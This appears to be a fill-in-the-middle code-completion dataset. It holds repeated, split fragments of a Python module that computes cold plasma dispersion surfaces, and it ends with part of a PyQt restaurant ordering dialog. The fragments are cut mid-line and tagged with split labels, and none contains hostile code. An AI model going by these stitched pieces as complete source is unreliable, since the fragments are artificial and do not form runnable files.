b_x = -kc_z_mat * e_y / w_final
b_y = (kc_z_mat * e_x - kc_x_mat * e_z) / w_final
b_z = kc_x_mat * e_y / w_final
b_par = np.sqrt(b_z * np.conj(b_z))
b_per = np.sqrt(b_x * np.conj(b_x) + b_y * np.conj(b_y))
b_pol = -2 * np.imag(b_x * np.conj(b_y)) / b_per ** 2
b_tot = np.sqrt(
b_x * np.conj(b_x) + b_y * np.conj(b_y) + b_z * np.conj(b_z))
return b_x, b_y, b_z, b_par, b_per, b_pol, b_tot
def _calc_s(e_x, e_y, e_z, b_x, b_y, b_z):
# Poynting flux
s_x = e_y * np.conj(b_z) - e_z * np.conj(b_y)
s_y = e_z * np.conj(b_x) - e_x * np.conj(b_z)
s_z = e_x * np.conj(b_y) - e_y * np.conj(b_x)
s_par = np.abs(s_z)
s_tot = np.sqrt(s_x * np.conj(s_x) + s_y * np.conj(s_y)
+ s_z * np.conj(s_z))
return s_par, s_tot
def _calc_part2fields(wp_e, en_e, en_i, e_tot, b_tot):
n_e = wp_e ** 2
en_e_n = en_e * n_e
en_i_n = en_i * n_e
en_efield = 0.5 * e_tot ** 2
en_bfield = 0.5 * b_tot ** 2
ratio_part_field = (en_e_n + en_i_n) / (en_efield + en_bfield)
return ratio_part_field
def
|
(kc_x_mat, kc_z_mat, w_final, v_ex, v_ez, v_ix, v_iz):
dn_e_n = (kc_x_mat * v_ex + kc_z_mat * v_ez) / w_final
dn_e_n = np.sqrt(dn_e_n * np.conj(dn_e_n))
dn_i_n = (kc_x_mat * v_ix + kc_z_mat * v_iz) / w_final
dn_i_n = np.sqrt(dn_i_n * np.conj(dn_i_n))
dne_dni = dn_e_n / dn_i_n
return dn_e_n, dn_i_n, dne_dni
def _calc_vei(m_i, wc_i, w_final, e_x, e_y, e_z):
q_e, q_i, m_e, wc_e = [-1, 1, 1, 1]
v_ex = 1j * q_e * (w_final * e_x - 1j * wc_e * e_y)
v_ex /= m_e * (w_final ** 2 - wc_e ** 2)
v_ey = 1j * q_e * (1j * wc_e * e_x + w_final * e_y)
v_ey /= m_e * (w_final ** 2 - wc_e ** 2)
v_ez = 1j * q_e * e_z / (m_e * w_final)
v_ix = 1j * q_i * (w_final * e_x + 1j * wc_i * e_y)
v_ix /= m_i * (w_final ** 2 - wc_i ** 2)
v_iy = 1j * q_i * (-1j * wc_i * e_x + w_final * e_y)
v_iy /= m_i * (w_final ** 2 - wc_i ** 2)
v_iz = 1j * q_i * e_z / (m_i * w_final)
return v_ex, v_ey, v_ez, v_ix, v_iy, v_iz
def disp_surf_calc(kc_x_max, kc_z_max, m_i, wp_e):
r"""Calculate the cold plasma dispersion surfaces according to equation
2.64 in Plasma Waves by Swanson (2nd ed.)
Parameters
----------
kc_x_max : float
Max value of k_perpendicular*c/w_c.
kc_z_max : float
Max value of k_parallel*c/w_c.
m_i : float
Ion mass in terms of electron masses.
wp_e : float
Electron plasma frequency in terms of electron gyro frequency.
Returns
-------
kx_ : ndarray
kperpandicular*c/w_c meshgrid
kz_ : ndarray
kparallel*c/w_c meshgrid
wf_ : ndarray
Dispersion surfaces.
extra_param : dict
Extra parameters to plot.
"""
# Make vectors of the wave numbers
kc_z = np.linspace(1e-6, kc_z_max, 35)
kc_x = np.linspace(1e-6, kc_x_max, 35)
# Turn those vectors into matrices
kc_x_mat, kc_z_mat = np.meshgrid(kc_x, kc_z)
# Find some of the numbers that appear later in the calculations
kc_ = np.sqrt(kc_x_mat ** 2 + kc_z_mat ** 2) # Absolute value of k
theta_ = np.arctan2(kc_x_mat, kc_z_mat) # The angle between k and B
wc_i = 1 / m_i # The ion gyro frequency
wp_i = wp_e / np.sqrt(m_i) # The ion plasma frequency
wp_ = np.sqrt(wp_e ** 2 + wp_i ** 2) # The total plasma frequency
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# For every k_perp and k_par, turn the dispersion relation into a
# polynomial equation and solve it.
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# The polynomial coefficients are calculated
pol_koeff_8 = -2 * kc_ ** 2
pol_koeff_8 -= (1 + wc_i ** 2 + 3 * wp_ ** 2) * np.ones(kc_.shape)
pol_koeff_6 = (2 * kc_ ** 2 + wp_ ** 2) * (1 + wc_i ** 2 + 2 * wp_ ** 2)
pol_koeff_6 += kc_ ** 4 + (wp_ ** 2 + wc_i) ** 2
pol_koeff_4 = -kc_ ** 4 * (1 + wc_i ** 2 + wp_ ** 2)
pol_koeff_4 -= 2 * kc_ ** 2 * (wp_ ** 2 + wc_i) ** 2
pol_koeff_4 -= (kc_ * wp_) ** 2 * (1 + wc_i ** 2 - wc_i) * (
1 + np.cos(theta_) ** 2)
pol_koeff_4 -= wp_ ** 2 * (wp_ ** 2 + wc_i) ** 2
pol_koeff_2 = kc_ ** 4 * (wp_ ** 2 * (1 + wc_i ** 2 - wc_i) * np.cos(
theta_) ** 2 + wc_i * (wp_ ** 2 + wc_i))
pol_koeff_2 += kc_ ** 2 * wp_ ** 2 * wc_i * (wp_ ** 2 + wc_i) * (
1 + np.cos(theta_) ** 2)
pol_koeff_0 = -kc_ ** 4 * wc_i ** 2 * wp_ ** 2 * np.cos(theta_) ** 2
w_final = np.zeros((10, len(kc_z), len(kc_x)))
# For each k, solve the equation
for k_z, k_x in itertools.product(range(len(kc_z)), range(len(kc_x))):
disp_polynomial = [1, 0, pol_koeff_8[k_z, k_x], 0,
pol_koeff_6[k_z, k_x], 0, pol_koeff_4[k_z, k_x],
0, pol_koeff_2[k_z, k_x], 0, pol_koeff_0[k_z, k_x]]
# theoretically should be real (A. Tjulin)
w_temp = np.real(np.roots(disp_polynomial))
# We need to sort the answers to get nice surfaces.
w_final[:, k_z, k_x] = np.sort(w_temp)
n2_ = kc_ ** 2 / w_final **
|
_calc_continuity
|
identifier_name
|
disp_surf_calc.py
|
* np.conj(e_x) + e_y * np.conj(e_y))
e_tot = np.sqrt(e_x * np.conj(e_x) + e_y * np.conj(e_y) + e_z ** 2)
e_pol = -2 * np.imag(e_x * np.conj(e_y)) / e_per ** 2
return e_x, e_y, e_z, e_per, e_tot, e_pol
def _calc_b(kc_x_mat, kc_z_mat, w_final, e_x, e_y, e_z):
b_x = -kc_z_mat * e_y / w_final
b_y = (kc_z_mat * e_x - kc_x_mat * e_z) / w_final
b_z = kc_x_mat * e_y / w_final
b_par = np.sqrt(b_z * np.conj(b_z))
b_per = np.sqrt(b_x * np.conj(b_x) + b_y * np.conj(b_y))
b_pol = -2 * np.imag(b_x * np.conj(b_y)) / b_per ** 2
b_tot = np.sqrt(
b_x * np.conj(b_x) + b_y * np.conj(b_y) + b_z * np.conj(b_z))
return b_x, b_y, b_z, b_par, b_per, b_pol, b_tot
def _calc_s(e_x, e_y, e_z, b_x, b_y, b_z):
|
s_y = e_z * np.conj(b_x) - e_x * np.conj(b_z)
s_z = e_x * np.conj(b_y) - e_y * np.conj(b_x)
s_par = np.abs(s_z)
s_tot = np.sqrt(s_x * np.conj(s_x) + s_y * np.conj(s_y)
+ s_z * np.conj(s_z))
return s_par, s_tot
def _calc_part2fields(wp_e, en_e, en_i, e_tot, b_tot):
n_e = wp_e ** 2
en_e_n = en_e * n_e
en_i_n = en_i * n_e
en_efield = 0.5 * e_tot ** 2
en_bfield = 0.5 * b_tot ** 2
ratio_part_field = (en_e_n + en_i_n) / (en_efield + en_bfield)
return ratio_part_field
def _calc_continuity(kc_x_mat, kc_z_mat, w_final, v_ex, v_ez, v_ix, v_iz):
dn_e_n = (kc_x_mat * v_ex + kc_z_mat * v_ez) / w_final
dn_e_n = np.sqrt(dn_e_n * np.conj(dn_e_n))
dn_i_n = (kc_x_mat * v_ix + kc_z_mat * v_iz) / w_final
dn_i_n = np.sqrt(dn_i_n * np.conj(dn_i_n))
dne_dni = dn_e_n / dn_i_n
return dn_e_n, dn_i_n, dne_dni
def _calc_vei(m_i, wc_i, w_final, e_x, e_y, e_z):
q_e, q_i, m_e, wc_e = [-1, 1, 1, 1]
v_ex = 1j * q_e * (w_final * e_x - 1j * wc_e * e_y)
v_ex /= m_e * (w_final ** 2 - wc_e ** 2)
v_ey = 1j * q_e * (1j * wc_e * e_x + w_final * e_y)
v_ey /= m_e * (w_final ** 2 - wc_e ** 2)
v_ez = 1j * q_e * e_z / (m_e * w_final)
v_ix = 1j * q_i * (w_final * e_x + 1j * wc_i * e_y)
v_ix /= m_i * (w_final ** 2 - wc_i ** 2)
v_iy = 1j * q_i * (-1j * wc_i * e_x + w_final * e_y)
v_iy /= m_i * (w_final ** 2 - wc_i ** 2)
v_iz = 1j * q_i * e_z / (m_i * w_final)
return v_ex, v_ey, v_ez, v_ix, v_iy, v_iz
def disp_surf_calc(kc_x_max, kc_z_max, m_i, wp_e):
r"""Calculate the cold plasma dispersion surfaces according to equation
2.64 in Plasma Waves by Swanson (2nd ed.)
Parameters
----------
kc_x_max : float
Max value of k_perpendicular*c/w_c.
kc_z_max : float
Max value of k_parallel*c/w_c.
m_i : float
Ion mass in terms of electron masses.
wp_e : float
Electron plasma frequency in terms of electron gyro frequency.
Returns
-------
kx_ : ndarray
kperpandicular*c/w_c meshgrid
kz_ : ndarray
kparallel*c/w_c meshgrid
wf_ : ndarray
Dispersion surfaces.
extra_param : dict
Extra parameters to plot.
"""
# Make vectors of the wave numbers
kc_z = np.linspace(1e-6, kc_z_max, 35)
kc_x = np.linspace(1e-6, kc_x_max, 35)
# Turn those vectors into matrices
kc_x_mat, kc_z_mat = np.meshgrid(kc_x, kc_z)
# Find some of the numbers that appear later in the calculations
kc_ = np.sqrt(kc_x_mat ** 2 + kc_z_mat ** 2) # Absolute value of k
theta_ = np.arctan2(kc_x_mat, kc_z_mat) # The angle between k and B
wc_i = 1 / m_i # The ion gyro frequency
wp_i = wp_e / np.sqrt(m_i) # The ion plasma frequency
wp_ = np.sqrt(wp_e ** 2 + wp_i ** 2) # The total plasma frequency
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# For every k_perp and k_par, turn the dispersion relation into a
# polynomial equation and solve it.
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# The polynomial coefficients are calculated
pol_koeff_8 = -2 * kc_ ** 2
pol_koeff_8 -= (1 + wc_i ** 2 + 3 * wp_ ** 2) * np.ones(kc_.shape)
pol_koeff_6 = (2 * kc_ ** 2 + wp_ ** 2) * (1 + wc_i ** 2 + 2 * wp_ ** 2)
pol_koeff_6 += kc_ ** 4 + (wp_ ** 2 + wc_i) ** 2
pol_koeff_4 = -kc_ ** 4 * (1 + wc_i ** 2 + wp_ ** 2)
pol_koeff_4 -= 2 * kc_ ** 2 * (wp_ ** 2 + wc_i) ** 2
pol_koeff_4 -= (kc_ * wp_) ** 2 * (1 + wc_i ** 2 - wc_i) * (
1 + np.cos(theta_) ** 2)
pol_koeff_4 -= wp_ ** 2 * (wp_ ** 2 + wc_i) ** 2
pol_koeff_2 = kc_ ** 4 * (wp_ ** 2 * (1 + wc_i ** 2 - wc_i) * np.cos(
theta_) ** 2 + wc_i * (wp_ ** 2 + wc_i))
pol_koeff_2 += kc_ ** 2 * wp_ ** 2 * wc_i * (wp_ ** 2 + wc_i) * (
1 + np.cos(theta_) ** 2)
pol_koeff_0 = -kc_ ** 4 * wc_i ** 2 * wp_ ** 2 * np.cos(theta_) ** 2
w_final = np.zeros((10, len(kc_z), len(kc_x)))
# For each k, solve the equation
for k_z, k_x in itertools.product(range(len(kc_z)), range(len(kc_x))):
disp_polynomial = [1, 0, pol_koeff_8[k_z, k_x], 0,
pol_koeff_6[k_z, k_x], 0, pol_koeff_4[k_z, k_x],
0, pol_koeff_2[k_z, k_x], 0, pol_koeff_0[k_z, k_x]]
# theoretically should be real (A. Tjulin)
w_temp = np.real(np.roots(disp_polynomial))
# We need to sort the answers to get nice surfaces.
w_final[:, k_z, k_x] = np.sort(w_temp)
n2_ = kc_ ** 2 / w_final
|
# Poynting flux
s_x = e_y * np.conj(b_z) - e_z * np.conj(b_y)
|
random_line_split
|
disp_surf_calc.py
|
* np.conj(e_x) + e_y * np.conj(e_y))
e_tot = np.sqrt(e_x * np.conj(e_x) + e_y * np.conj(e_y) + e_z ** 2)
e_pol = -2 * np.imag(e_x * np.conj(e_y)) / e_per ** 2
return e_x, e_y, e_z, e_per, e_tot, e_pol
def _calc_b(kc_x_mat, kc_z_mat, w_final, e_x, e_y, e_z):
b_x = -kc_z_mat * e_y / w_final
b_y = (kc_z_mat * e_x - kc_x_mat * e_z) / w_final
b_z = kc_x_mat * e_y / w_final
b_par = np.sqrt(b_z * np.conj(b_z))
b_per = np.sqrt(b_x * np.conj(b_x) + b_y * np.conj(b_y))
b_pol = -2 * np.imag(b_x * np.conj(b_y)) / b_per ** 2
b_tot = np.sqrt(
b_x * np.conj(b_x) + b_y * np.conj(b_y) + b_z * np.conj(b_z))
return b_x, b_y, b_z, b_par, b_per, b_pol, b_tot
def _calc_s(e_x, e_y, e_z, b_x, b_y, b_z):
# Poynting flux
s_x = e_y * np.conj(b_z) - e_z * np.conj(b_y)
s_y = e_z * np.conj(b_x) - e_x * np.conj(b_z)
s_z = e_x * np.conj(b_y) - e_y * np.conj(b_x)
s_par = np.abs(s_z)
s_tot = np.sqrt(s_x * np.conj(s_x) + s_y * np.conj(s_y)
+ s_z * np.conj(s_z))
return s_par, s_tot
def _calc_part2fields(wp_e, en_e, en_i, e_tot, b_tot):
n_e = wp_e ** 2
en_e_n = en_e * n_e
en_i_n = en_i * n_e
en_efield = 0.5 * e_tot ** 2
en_bfield = 0.5 * b_tot ** 2
ratio_part_field = (en_e_n + en_i_n) / (en_efield + en_bfield)
return ratio_part_field
def _calc_continuity(kc_x_mat, kc_z_mat, w_final, v_ex, v_ez, v_ix, v_iz):
dn_e_n = (kc_x_mat * v_ex + kc_z_mat * v_ez) / w_final
dn_e_n = np.sqrt(dn_e_n * np.conj(dn_e_n))
dn_i_n = (kc_x_mat * v_ix + kc_z_mat * v_iz) / w_final
dn_i_n = np.sqrt(dn_i_n * np.conj(dn_i_n))
dne_dni = dn_e_n / dn_i_n
return dn_e_n, dn_i_n, dne_dni
def _calc_vei(m_i, wc_i, w_final, e_x, e_y, e_z):
q_e, q_i, m_e, wc_e = [-1, 1, 1, 1]
v_ex = 1j * q_e * (w_final * e_x - 1j * wc_e * e_y)
v_ex /= m_e * (w_final ** 2 - wc_e ** 2)
v_ey = 1j * q_e * (1j * wc_e * e_x + w_final * e_y)
v_ey /= m_e * (w_final ** 2 - wc_e ** 2)
v_ez = 1j * q_e * e_z / (m_e * w_final)
v_ix = 1j * q_i * (w_final * e_x + 1j * wc_i * e_y)
v_ix /= m_i * (w_final ** 2 - wc_i ** 2)
v_iy = 1j * q_i * (-1j * wc_i * e_x + w_final * e_y)
v_iy /= m_i * (w_final ** 2 - wc_i ** 2)
v_iz = 1j * q_i * e_z / (m_i * w_final)
return v_ex, v_ey, v_ez, v_ix, v_iy, v_iz
def disp_surf_calc(kc_x_max, kc_z_max, m_i, wp_e):
|
wf_ : ndarray
Dispersion surfaces.
extra_param : dict
Extra parameters to plot.
"""
# Make vectors of the wave numbers
kc_z = np.linspace(1e-6, kc_z_max, 35)
kc_x = np.linspace(1e-6, kc_x_max, 35)
# Turn those vectors into matrices
kc_x_mat, kc_z_mat = np.meshgrid(kc_x, kc_z)
# Find some of the numbers that appear later in the calculations
kc_ = np.sqrt(kc_x_mat ** 2 + kc_z_mat ** 2) # Absolute value of k
theta_ = np.arctan2(kc_x_mat, kc_z_mat) # The angle between k and B
wc_i = 1 / m_i # The ion gyro frequency
wp_i = wp_e / np.sqrt(m_i) # The ion plasma frequency
wp_ = np.sqrt(wp_e ** 2 + wp_i ** 2) # The total plasma frequency
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# For every k_perp and k_par, turn the dispersion relation into a
# polynomial equation and solve it.
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# The polynomial coefficients are calculated
pol_koeff_8 = -2 * kc_ ** 2
pol_koeff_8 -= (1 + wc_i ** 2 + 3 * wp_ ** 2) * np.ones(kc_.shape)
pol_koeff_6 = (2 * kc_ ** 2 + wp_ ** 2) * (1 + wc_i ** 2 + 2 * wp_ ** 2)
pol_koeff_6 += kc_ ** 4 + (wp_ ** 2 + wc_i) ** 2
pol_koeff_4 = -kc_ ** 4 * (1 + wc_i ** 2 + wp_ ** 2)
pol_koeff_4 -= 2 * kc_ ** 2 * (wp_ ** 2 + wc_i) ** 2
pol_koeff_4 -= (kc_ * wp_) ** 2 * (1 + wc_i ** 2 - wc_i) * (
1 + np.cos(theta_) ** 2)
pol_koeff_4 -= wp_ ** 2 * (wp_ ** 2 + wc_i) ** 2
pol_koeff_2 = kc_ ** 4 * (wp_ ** 2 * (1 + wc_i ** 2 - wc_i) * np.cos(
theta_) ** 2 + wc_i * (wp_ ** 2 + wc_i))
pol_koeff_2 += kc_ ** 2 * wp_ ** 2 * wc_i * (wp_ ** 2 + wc_i) * (
1 + np.cos(theta_) ** 2)
pol_koeff_0 = -kc_ ** 4 * wc_i ** 2 * wp_ ** 2 * np.cos(theta_) ** 2
w_final = np.zeros((10, len(kc_z), len(kc_x)))
# For each k, solve the equation
for k_z, k_x in itertools.product(range(len(kc_z)), range(len(kc_x))):
disp_polynomial = [1, 0, pol_koeff_8[k_z, k_x], 0,
pol_koeff_6[k_z, k_x], 0, pol_koeff_4[k_z, k_x],
0, pol_koeff_2[k_z, k_x], 0, pol_koeff_0[k_z, k_x]]
# theoretically should be real (A. Tjulin)
w_temp = np.real(np.roots(disp_polynomial))
# We need to sort the answers to get nice surfaces.
w_final[:, k_z, k_x] = np.sort(w_temp)
n2_ = kc_ ** 2 / w_final **
|
r"""Calculate the cold plasma dispersion surfaces according to equation
2.64 in Plasma Waves by Swanson (2nd ed.)
Parameters
----------
kc_x_max : float
Max value of k_perpendicular*c/w_c.
kc_z_max : float
Max value of k_parallel*c/w_c.
m_i : float
Ion mass in terms of electron masses.
wp_e : float
Electron plasma frequency in terms of electron gyro frequency.
Returns
-------
kx_ : ndarray
kperpandicular*c/w_c meshgrid
kz_ : ndarray
kparallel*c/w_c meshgrid
|
identifier_body
|
disp_surf_calc.py
|
wf_ : ndarray
Dispersion surfaces.
extra_param : dict
Extra parameters to plot.
"""
# Make vectors of the wave numbers
kc_z = np.linspace(1e-6, kc_z_max, 35)
kc_x = np.linspace(1e-6, kc_x_max, 35)
# Turn those vectors into matrices
kc_x_mat, kc_z_mat = np.meshgrid(kc_x, kc_z)
# Find some of the numbers that appear later in the calculations
kc_ = np.sqrt(kc_x_mat ** 2 + kc_z_mat ** 2) # Absolute value of k
theta_ = np.arctan2(kc_x_mat, kc_z_mat) # The angle between k and B
wc_i = 1 / m_i # The ion gyro frequency
wp_i = wp_e / np.sqrt(m_i) # The ion plasma frequency
wp_ = np.sqrt(wp_e ** 2 + wp_i ** 2) # The total plasma frequency
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# For every k_perp and k_par, turn the dispersion relation into a
# polynomial equation and solve it.
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# The polynomial coefficients are calculated
pol_koeff_8 = -2 * kc_ ** 2
pol_koeff_8 -= (1 + wc_i ** 2 + 3 * wp_ ** 2) * np.ones(kc_.shape)
pol_koeff_6 = (2 * kc_ ** 2 + wp_ ** 2) * (1 + wc_i ** 2 + 2 * wp_ ** 2)
pol_koeff_6 += kc_ ** 4 + (wp_ ** 2 + wc_i) ** 2
pol_koeff_4 = -kc_ ** 4 * (1 + wc_i ** 2 + wp_ ** 2)
pol_koeff_4 -= 2 * kc_ ** 2 * (wp_ ** 2 + wc_i) ** 2
pol_koeff_4 -= (kc_ * wp_) ** 2 * (1 + wc_i ** 2 - wc_i) * (
1 + np.cos(theta_) ** 2)
pol_koeff_4 -= wp_ ** 2 * (wp_ ** 2 + wc_i) ** 2
pol_koeff_2 = kc_ ** 4 * (wp_ ** 2 * (1 + wc_i ** 2 - wc_i) * np.cos(
theta_) ** 2 + wc_i * (wp_ ** 2 + wc_i))
pol_koeff_2 += kc_ ** 2 * wp_ ** 2 * wc_i * (wp_ ** 2 + wc_i) * (
1 + np.cos(theta_) ** 2)
pol_koeff_0 = -kc_ ** 4 * wc_i ** 2 * wp_ ** 2 * np.cos(theta_) ** 2
w_final = np.zeros((10, len(kc_z), len(kc_x)))
# For each k, solve the equation
for k_z, k_x in itertools.product(range(len(kc_z)), range(len(kc_x))):
disp_polynomial = [1, 0, pol_koeff_8[k_z, k_x], 0,
pol_koeff_6[k_z, k_x], 0, pol_koeff_4[k_z, k_x],
0, pol_koeff_2[k_z, k_x], 0, pol_koeff_0[k_z, k_x]]
# theoretically should be real (A. Tjulin)
w_temp = np.real(np.roots(disp_polynomial))
# We need to sort the answers to get nice surfaces.
w_final[:, k_z, k_x] = np.sort(w_temp)
n2_ = kc_ ** 2 / w_final ** 2
v_ph_c = np.sqrt(1. / n2_)
va_c = 1 / (wp_e * np.sqrt(m_i))
v_ph_va = v_ph_c / va_c
diel_tensor = _calc_diel(kc_, w_final, theta_, wp_e, wp_i, wc_i)
e_x, e_y, e_z, e_per, e_tot, e_pol = _calc_e(diel_tensor)
e_par = (kc_x_mat * e_x + kc_z_mat * e_z) / kc_
b_x, b_y, b_z, b_par, b_per, b_pol, b_tot = _calc_b(kc_x_mat, kc_z_mat,
w_final, e_x, e_y, e_z)
dk_x, dk_z = [kc_x_mat[1], kc_z_mat[1]]
dw_x, dw_z = [np.zeros(w_final.shape) for _ in range(2)]
dw_x[:, :, 1:] = np.diff(w_final, axis=2)
dw_z[:, 1:, :] = np.diff(w_final, axis=1)
v_x, v_z = [dw_ / dk for dw_, dk in zip([dw_x, dw_z], [dk_x, dk_z])]
s_par, s_tot = _calc_s(e_x, e_y, e_z, b_x, b_y, b_z)
# Compute ion and electron velocities
v_ex, v_ey, v_ez, v_ix, v_iy, v_iz = _calc_vei(m_i, wc_i, w_final,
e_x, e_y, e_z)
# Ratio of parallel and perpendicular to B speed
vepar_perp = v_ez * np.conj(v_ez)
vepar_perp /= (v_ex * np.conj(v_ex) + v_ey * np.conj(v_ey))
vipar_perp = v_iz * np.conj(v_iz)
vipar_perp /= (v_ix * np.conj(v_ix) + v_iy * np.conj(v_iy))
# Total particle speeds
v_e2 = v_ex * np.conj(v_ex) + v_ey * np.conj(v_ey) + v_ez * np.conj(v_ez)
v_i2 = v_ix * np.conj(v_ix) + v_iy * np.conj(v_iy) + v_iz * np.conj(v_iz)
# Ion and electron energies
m_e = -1
en_e = 0.5 * m_e * v_e2
en_i = 0.5 * m_i * v_i2
# Ratio of particle and field energy densities
ratio_part_field = _calc_part2fields(wp_e, en_e, en_i, e_tot, b_tot)
# Continuity equation
dn_e_n, dn_i_n, dne_dni = _calc_continuity(kc_x_mat, kc_z_mat, w_final,
v_ex, v_ez, v_ix, v_iz)
dn_e_n_db_b = dn_e_n / b_tot
dn_i_n_db_b = dn_i_n / b_tot
dn_e_n_dbpar_b = dn_e_n / b_par
dn_i_n_dbpar_b = dn_i_n / b_par
dn_e = dn_e_n * wp_e ** 2
k_dot_e = e_x * kc_x_mat + e_z * kc_z_mat
k_dot_e = np.sqrt(k_dot_e * np.conj(k_dot_e))
# Build output dict
extra_param = {"Degree of electromagnetism": np.log10(b_tot / e_tot),
"Degree of longitudinality": np.abs(e_par) / e_tot,
"Degree of parallelity E": e_z / e_tot,
"Degree of parallelity B": np.sqrt(
b_z * np.conj(b_z)) / b_tot,
"Ellipticity E": e_pol, "Ellipticity B": b_pol,
"E_part/E_field": np.log10(ratio_part_field),
"v_g": np.sqrt(v_x ** 2 + v_z ** 2),
"v_ph/v_a": np.log10(v_ph_va),
"E_e/E_i": np.log10(en_e / en_i),
"v_e/v_i": np.log10(np.sqrt(v_e2 / v_i2)),
"v_epara/v_eperp": np.log10(vepar_perp),
"v_ipara/v_iperp": np.log10(vipar_perp),
"dn_e/dn_i": np.log10(dne_dni),
"(dn_e/n)/ (dB/B)": np.log10(dn_e_n_db_b),
"(dn_i/n)/(dB/B)": np.log10(dn_i_n_db_b),
"(dn_i/n)/(dBpar/B)": np.log10(dn_i_n_dbpar_b),
"(dn_e/n)/(dB/B)": np.log10(dn_e / k_dot_e),
"(dn_e/n)/(dBpar /B)": np.log10(dn_e_n_dbpar_b),
" Spar/Stot": s_par / s_tot}
for k, v in zip(extra_param.keys(), extra_param.values()):
|
extra_param[k] = np.transpose(np.real(v), [0, 2, 1])
|
conditional_block
|
|
app.py
|
self.checkOutBtn = QtWidgets.QPushButton(self.itemBox)
self.checkOutBtn.setGeometry(QtCore.QRect(290, 140, 75, 23))
self.checkOutBtn.setObjectName("checkOutBtn")
self.checkOutBtn.clicked.connect(self.checkOutFunction)
self.noteBtn = QtWidgets.QPushButton(self.itemBox)
self.noteBtn.setGeometry(QtCore.QRect(290, 80, 75, 23))
self.noteBtn.setObjectName("noteBtn")
self.noteBtn.setEnabled(False)
self.addItemBtn = QtWidgets.QPushButton(self.itemBox)
self.addItemBtn.setGeometry(QtCore.QRect(290, 50, 75, 23))
self.addItemBtn.setObjectName("addItemBtn")
self.addItemBtn.clicked.connect(self.addItemFunction)
self.tableList = [i for i in range(21)]
self.tableDrop = QtWidgets.QComboBox(self.itemBox)
self.tableDrop.setGeometry(QtCore.QRect(200, 20, 69, 22))
self.tableDrop.setObjectName("tableDrop")
for table in self.tableList:
self.tableDrop.addItem(str(table))
self.itemDataBase[str(table)] = ["Table Number "+str(table)]
self.tableDrop.activated.connect(self.loadTableItem)
self.tableNoLbl = QtWidgets.QLabel(self.itemBox)
self.tableNoLbl.setGeometry(QtCore.QRect(120, 10, 131, 41))
self.tableNoLbl.setObjectName("tableNoLbl")
self.addTable = QtWidgets.QPushButton(self.itemBox)
self.addTable.setGeometry(QtCore.QRect(10, 20, 75, 23))
self.addTable.setObjectName("AddTable")
self.addTable.clicked.connect(self.addTableFunction)
self.addTable.setEnabled(False)
self.showItem = QtWidgets.QTextEdit(self.itemBox)
self.showItem.setGeometry(QtCore.QRect(10, 50, 261, 231))
self.showItem.setObjectName("showItem")
self.showItem.setReadOnly(True)
self.orderButton = QtWidgets.QPushButton(self.itemBox)
self.orderButton.setGeometry(QtCore.QRect(290, 110, 75, 23))
self.orderButton.setObjectName("orderButton")
self.orderButton.clicked.connect(self.orderFunction)
self.orderButton.setEnabled(False)
self.loadBackupFile = QtWidgets.QPushButton(self.itemBox)
self.loadBackupFile.setGeometry(QtCore.QRect(290, 20, 75, 23))
self.loadBackupFile.setObjectName("loadBackupFile")
self.loadBackupFile.clicked.connect(self.loadBackupFunction)
self.loadBackupFile.setEnabled(False)
self.loginBox = QtWidgets.QGroupBox(Dialog)
self.loginBox.setGeometry(QtCore.QRect(10, 10, 381, 81))
self.loginBox.setObjectName("loginBox")
self.userLbl = QtWidgets.QLabel(self.loginBox)
self.userLbl.setGeometry(QtCore.QRect(10, 20, 47, 21))
font = QtGui.QFont()
font.setPointSize(14)
self.userLbl.setFont(font)
self.userLbl.setObjectName("userLbl")
self.inputUser = QtWidgets.QLineEdit(self.loginBox)
self.inputUser.setGeometry(QtCore.QRect(70, 20, 201, 21))
self.inputUser.setObjectName("inputUser")
self.loginBtn = QtWidgets.QPushButton(self.loginBox)
self.loginBtn.setGeometry(QtCore.QRect(290, 20, 75, 23))
self.loginBtn.setObjectName("loginBtn")
self.loginBtn.clicked.connect(self.loginFunction)
self.inputPwd = QtWidgets.QLineEdit(self.loginBox)
self.inputPwd.setGeometry(QtCore.QRect(70, 50, 201, 21))
self.inputPwd.setObjectName("inputPwd")
self.inputPwd.setEchoMode(QtWidgets.QLineEdit.Password)
|
self.passLbl = QtWidgets.QLabel(self.loginBox)
self.passLbl.setGeometry(QtCore.QRect(10, 50, 47, 21))
font = QtGui.QFont()
font.setPointSize(14)
self.passLbl.setFont(font)
self.passLbl.setObjectName("passLbl")
self.msgWrong = QMessageBox()
self.msgWrong.setWindowTitle("Login Check")
self.msgWrong.setText("Wrong user/password!")
self.msgWrong.setIcon(QMessageBox.Critical)
self.msgCorrect = QMessageBox()
self.msgCorrect.setWindowTitle("Login Check")
self.msgCorrect.setText(" Login Successful!")
self.msgCorrect.setIcon(QMessageBox.Information)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
self.removeOldBackupFile()
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.itemBox.setTitle(_translate("Dialog", "GroupBox"))
self.checkOutBtn.setText(_translate("Dialog", "Check out"))
self.noteBtn.setText(_translate("Dialog", "Note"))
self.addItemBtn.setText(_translate("Dialog", "Add Items"))
self.tableDrop.setItemText(0, _translate("Dialog", "1"))
self.tableDrop.setItemText(1, _translate("Dialog", "2"))
self.tableDrop.setItemText(2, _translate("Dialog", "3"))
self.tableNoLbl.setText(_translate("Dialog", "Table Number"))
self.showItem.setHtml(_translate("Dialog", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
